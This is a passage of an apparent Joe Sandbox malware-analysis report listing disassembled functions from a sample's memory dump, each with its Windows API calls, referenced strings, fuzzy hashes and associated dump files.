Opcode Fuzzy Hash: 6d9c17f03010f9a17f6bc6346dbc5885d363ec59feb30bedf394393f3aaed4cd
Instruction Fuzzy Hash: 61A16CB1504301AFC740EF58C891EABB7EEAF99704F00491DF15697291EB70EE09CB96

Function 006ADA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

+, xrefs: 006ADA96
#, xrefs: 006ADA9D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: b26b297d399b6c4fad07c4f2594527ad1fdcd3ad5096ca3c6219205af7254d2f
Instruction ID: 24022d1e0424a758882d7c8a76ec8f31599aaa4e37cd222c8858eda400ee8cb1
Opcode Fuzzy Hash: b26b297d399b6c4fad07c4f2594527ad1fdcd3ad5096ca3c6219205af7254d2f
Instruction Fuzzy Hash: 795121B5204246DFDF21EF68C445AFABBE5BF1A310F144155F992AB2D0D7389C46CB24

Function 006D503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0072DC40,?,0000000F,0000000C,00000016,0072DC40,?), ref: 006D507B

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

Part of subcall function 0069B8A7: _memmove.LIBCMT ref: 0069B8FB

CharUpperBuffW.USER32(?,?,00000000,?), ref: 006D50FB

Strings

REMOVE, xrefs: 006D50AC
THIS, xrefs: 006D5139

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf_memmove
String ID: REMOVE$THIS
API String ID: 2528338962-776492005
Opcode ID: a3066e16d00c73be4d04264aba508f6e5c9ef7d720f8c0040ec5f774842d815e
Instruction ID: 886d849158f5cafadbbbfd44dc434f8da92bceeee9006a0ed5dd2b953e909b1e
Opcode Fuzzy Hash: a3066e16d00c73be4d04264aba508f6e5c9ef7d720f8c0040ec5f774842d815e
Instruction Fuzzy Hash: 71418034E00609AFCF41EF58CC81AAEB7B6BF49314F04806AE856AB792DB349D41CF51

Function 006CCF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006D4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006CC9FE,?,?,00000034,00000800,?,00000034), ref: 006D4D6B

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006CCFC9

Part of subcall function 006D4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006CCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 006D4D36

Part of subcall function 006D4C65: GetWindowThreadProcessId.USER32(?,?), ref: 006D4C90
Part of subcall function 006D4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006CC9C2,00000034,?,?,00001004,00000000,00000000), ref: 006D4CA0
Part of subcall function 006D4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006CC9C2,00000034,?,?,00001004,00000000,00000000), ref: 006D4CB6

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006CD036
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006CD083

Strings

@, xrefs: 006CD09B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b8ff939d4ec4393a8f9ced99d7c9451bcf55e4a79f532c6cde43143b94f3b597
Instruction ID: 5de3c80d8cf623564dadbbed45b510f130f527b0a7b2e23c7f464586f90b85ea
Opcode Fuzzy Hash: b8ff939d4ec4393a8f9ced99d7c9451bcf55e4a79f532c6cde43143b94f3b597
Instruction Fuzzy Hash: 08412C72E00218AFDB10DFA8CC85FEEB779EF49700F108099EA55B7291DA706E45CB65

Function 006FA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0072DBF0,00000000,?,?,?,?), ref: 006FA4E6
GetWindowLongW.USER32 ref: 006FA503
SetWindowLongW.USER32(?,000000F0,00000000), ref: 006FA513

Strings

SysTreeView32, xrefs: 006FA4B8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 5729b391d715b3300c7771211e09a0d60990f41d190da5cc19c38fc96aec7359
Instruction ID: deace3de3dadee9eaed5da8b4ff3e54192041924ea782732e4652a4d10351e7e
Opcode Fuzzy Hash: 5729b391d715b3300c7771211e09a0d60990f41d190da5cc19c38fc96aec7359
Instruction Fuzzy Hash: B231C071140209AFDB219E78CC45BE67BAAEF49334F208725F979932E0C774E8509B54

Function 006E57D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006E57E7
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006E581D

Strings

?Kn, xrefs: 006E5885
|, xrefs: 006E580C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CrackInternet_memset
String ID: ?Kn$|
API String ID: 1413715105-1129594349
Opcode ID: 7b9c680cf0fa1d0d4ae7b0dda2836b5a354e5b508b9c30fd27fbc6eb87ce7110
Instruction ID: eb45120fa46b6fe37e85740ea7d949c7b0d353daaf1ae811d84b3a98baff2a6c
Opcode Fuzzy Hash: 7b9c680cf0fa1d0d4ae7b0dda2836b5a354e5b508b9c30fd27fbc6eb87ce7110
Instruction Fuzzy Hash: E0311971801219AFCF51AFA1CC95EEF7FBAFF19314F104019E816A6162DB319A46CB64

Function 006FA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006FA74F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006FA75D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006FA764

Strings

msctls_updown32, xrefs: 006FA6C9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 7fcc0391fcb22dbee0b0794bb8a9a9ea53b64302de479ca13b90b862551c14fd
Instruction ID: 91dee8c2e35abc04dad23fe1028f11c3aa9f7a79fac98ee285c23dafd0a362ec
Opcode Fuzzy Hash: 7fcc0391fcb22dbee0b0794bb8a9a9ea53b64302de479ca13b90b862551c14fd
Instruction Fuzzy Hash: 35217FB5600209AFDB10EF68CCC1EB737AEEB4A3A5B044459FA0597391CB70EC118A65

Function 006F97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006F983D
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006F984D
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006F9872

Strings

Listbox, xrefs: 006F980A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 23803e1a87124a30c20128334753d1f80abef034ef01c0f09b006a07c4f52fba
Instruction ID: 651f1f95dde8ef12d0018f2ec32730a257fa97cb41b451bad6ce59d525fde170
Opcode Fuzzy Hash: 23803e1a87124a30c20128334753d1f80abef034ef01c0f09b006a07c4f52fba
Instruction Fuzzy Hash: 5D21953161021CBFDB219F54CC85FFB3BABEF8A7A4F018124FA155B290C6759C518BA0

Function 006FA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006FA27B
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006FA290
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006FA29D

Strings

msctls_trackbar32, xrefs: 006FA252

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 6fe331006db3ada1a6333f5a0f66ee61710ddfb3c319175858ed9a10989a20e9
Instruction ID: e52ea7fb46dfc01cf188533674905d790f6006c4074261e2e1f35d82ec8b8a21
Opcode Fuzzy Hash: 6fe331006db3ada1a6333f5a0f66ee61710ddfb3c319175858ed9a10989a20e9
Instruction Fuzzy Hash: 201127B1200308BAEB205FA4CC06FE73BA9EF89B54F014218FB4596190C672A811DB64

Function 006B2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 006B2F79
GetProcAddress.KERNEL32(00000000), ref: 006B2F80

Strings

RoInitialize, xrefs: 006B2F68
combase.dll, xrefs: 006B2F74

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: ec69797810864cc39a91609dbe8483fd11d2779ee08b3765cefd66218fb14367
Instruction ID: b7051fb7216cd2daf83623486e4edd5bcf992ebfa8f67c3af36164d2fcc47359
Opcode Fuzzy Hash: ec69797810864cc39a91609dbe8483fd11d2779ee08b3765cefd66218fb14367
Instruction Fuzzy Hash: 01E0E5B46D4709AAEB205B65EC49BD936AAAB05746F10C024B102D51E0DBBD4880DF4D

Function 006B3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006B2F4E), ref: 006B304E
GetProcAddress.KERNEL32(00000000), ref: 006B3055

Strings

combase.dll, xrefs: 006B3049
RoUninitialize, xrefs: 006B303D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 4b4a083d84ef5847cd19130228143f85e1c7d6b008108b8cffaf7bf9a3aa145f
Instruction ID: cbca332ee34607438da77a160d61c2ef5919a7d5c699e9c63ba795d635c4ba42
Opcode Fuzzy Hash: 4b4a083d84ef5847cd19130228143f85e1c7d6b008108b8cffaf7bf9a3aa145f
Instruction Fuzzy Hash: 61E092B4A88718EBEB309B65AD0DBC93A65BB04702F10C025F509A12F0EBBC49409F5E

Function 0070BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0070BA58
__swprintf.LIBCMT ref: 0070BA8C

Strings

WIN_XPe, xrefs: 0070BACB
%.3d, xrefs: 0070BA66

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: b7b6b7ef5dabd31dc56084d6dfc84007de0f69c6826b2f6b35177ff9b9f52939
Instruction ID: 57045ef0c61fe542d2cb1d0405fca598605b549fc16e67408b9580b14245b7ba
Opcode Fuzzy Hash: b7b6b7ef5dabd31dc56084d6dfc84007de0f69c6826b2f6b35177ff9b9f52939
Instruction Fuzzy Hash: 11E0ECF190801CEACA5496908C069FA73FCBB08300F10C592B91692084D33E9B54AB21

Function 006F20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006F20EC,?,006F22E0), ref: 006F2104
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 006F2116

Strings

GetProcessId, xrefs: 006F2110
kernel32.dll, xrefs: 006F20FF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: f2ca7b9e0209417c694556bcf792e05c4388f8349cc4f1d15e4459c0f651e1dc
Instruction ID: a4f6ed8db6e710dd6e00c86a30fd63ad3447e2a697f17a5122bed90409b7f90a
Opcode Fuzzy Hash: f2ca7b9e0209417c694556bcf792e05c4388f8349cc4f1d15e4459c0f651e1dc
Instruction Fuzzy Hash: 1BD0A7B4400327AFD7309F65E81D69277EAEF14300B11C419E749D1295D778C8C0CE14

Function 006AE6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006AE6D9,?,006AE55B,0072DC28,?,?), ref: 006AE6F1
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006AE703

Strings

IsWow64Process, xrefs: 006AE6FD
kernel32.dll, xrefs: 006AE6EC

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: 231644d4af5e2d34963ec4e7c330aa505d4776979174d923a1700d8c44ff30d0
Instruction ID: 36f0f8c8b00d903bc412b3eaaf6ab2d2a65d92e199b138fb49941959023e95bb
Opcode Fuzzy Hash: 231644d4af5e2d34963ec4e7c330aa505d4776979174d923a1700d8c44ff30d0
Instruction Fuzzy Hash: 83D0A9B4400322AFD7343F2AE84C6833BEABF06300B11C42AF495D2292DBB9CC80CE10

Function 006AE6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006AE69C,774D0AE0,006AE5AC,0072DC28,?,?), ref: 006AE6B4
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006AE6C6

Strings

GetNativeSystemInfo, xrefs: 006AE6C0
kernel32.dll, xrefs: 006AE6AF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 667fce055778f2ed7b7e67266af72c393804b9a6f7dc2935aa36fee3f14aeeab
Instruction ID: c4160d29b6b2084f0f79e2967700e2bff4ab2799734c5629e22f46e8a937b9cf
Opcode Fuzzy Hash: 667fce055778f2ed7b7e67266af72c393804b9a6f7dc2935aa36fee3f14aeeab
Instruction Fuzzy Hash: 20D0A7B45403229FDB306F35E80C68237D6AFA9305B11E819F445D12A0D778DC818E14

Function 006EEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006EEBAF,?,006EEAAC), ref: 006EEBC7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006EEBD9

Strings

GetSystemWow64DirectoryW, xrefs: 006EEBD3
kernel32.dll, xrefs: 006EEBC2

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: c0a2c7e1bd61edbd265a25782cd68eb13f357c4385df8f5bb45d3046d9139363
Instruction ID: a127dbd88ea790abe28636738c7f94fe72727319e13dc5a489b4f00c9683d6a7
Opcode Fuzzy Hash: c0a2c7e1bd61edbd265a25782cd68eb13f357c4385df8f5bb45d3046d9139363
Instruction Fuzzy Hash: EDD0A7B44047669FD7305F3AE848B8137D6AF04304B21C459F456D13A0DB78DC808A10

Function 006D137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

